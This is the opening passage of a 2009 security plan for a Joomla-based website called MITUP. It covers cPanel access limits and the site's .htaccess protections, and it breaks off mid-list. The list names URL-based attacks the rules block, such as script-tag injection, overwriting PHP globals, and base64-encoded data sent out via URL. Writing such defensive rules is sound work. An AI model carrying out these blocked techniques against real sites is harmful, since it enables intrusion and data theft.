1. Security Plan<br />Version: 3.0Date: 16/11/2009Authors:<br />TitleNameQuality ManagerBrenton Cunningham<br />Reviewers:<br />TitleNameTeam LeaderQuality ManagerSupport ManagerTechnical ManagerKevin RushGreg HaysJustine LeonardSean Rae<br />Table Of Contents<br /> TOC o "
h z u 1Introduction PAGEREF _Toc246152417 h 1<br />2Operating System PAGEREF _Toc246152418 h 1<br />3Web Server PAGEREF _Toc246152419 h 1<br />3.1Authentication and Access PAGEREF _Toc246152420 h 1<br />3.2Htaccess PAGEREF _Toc246152421 h 1<br />3.3Htaccess IP address or Domain PAGEREF _Toc246152422 h 2<br />3.4Browser Redirection PAGEREF _Toc246152423 h 2<br />4Database PAGEREF _Toc246152424 h 3<br />4.1MYSQL Accounts and Database Account Privileges PAGEREF _Toc246152425 h 3<br />4.2Database Connection Code PAGEREF _Toc246152426 h 3<br />5Login Scripts PAGEREF _Toc246152427 h 4<br />5.1PHP login scripts PAGEREF _Toc246152428 h 4<br />5.2Username and password authentication PAGEREF _Toc246152429 h 4<br />5.3Password Encryption PAGEREF _Toc246152430 h 4<br />5.4Sessions and control of access PAGEREF _Toc246152431 h 5<br />5.5User Types and Restrictions PAGEREF _Toc246152432 h 5<br />6Web Forms PAGEREF _Toc246152433 h 6<br />6.1Prevention of SQL injection PAGEREF _Toc246152434 h 6<br />6.2Cross Site Scripting in Joomla PAGEREF _Toc246152435 h 6<br />6.3Privacy Statement PAGEREF _Toc246152436 h 6<br />6.4Joomla token flaw PAGEREF _Toc246152437 h 7<br />6.5Security Flaw Fixes PAGEREF _Toc246152438 h 7<br />Introduction<br />The security plan will be used in the creation and maintenance of all aspects of security when creating the MITUP website.<br />The document will illustrate what security measures P.T.S will undertake when handling private data, the current security used in the MITUP site and also to document security standards which will be set when necessary while developing the new project software and systems. <br />Operating System<br />Due to the MITUP site being a web based project, it’s security is independent to any operating security. All MITUP data is stored on a FTP server that is password protected and is only accessible by the System Administrator. <br />Web Server<br />Authentication and Access<br />To access the Mitup web server you must login to the cpanel. Cpanel is a secure site that allows the system administrator to Create/edit preferences, manage emails of the site, backup and manage web server files, view logs, Server security, view domains, manage server databases and manage advance options.<br />To reduce cpanel infiltration access to the site was limited to two users. The two users who have access to the cpanel are our client, David Mackieson and the Mitup system administrator.<br />Htaccess<br />The .htaccess file that is used by Joomla prohibits:<br /><ul><li>Any script trying to set a mosConfig value through the URL
2. Any script trying to base64_encode data to send via URL
3. Any script that includes a <script> tag in URL
4. Any script trying to set a PHP GLOBALS variable via URL
5. Any script trying to modify a _REQUEST variable via URL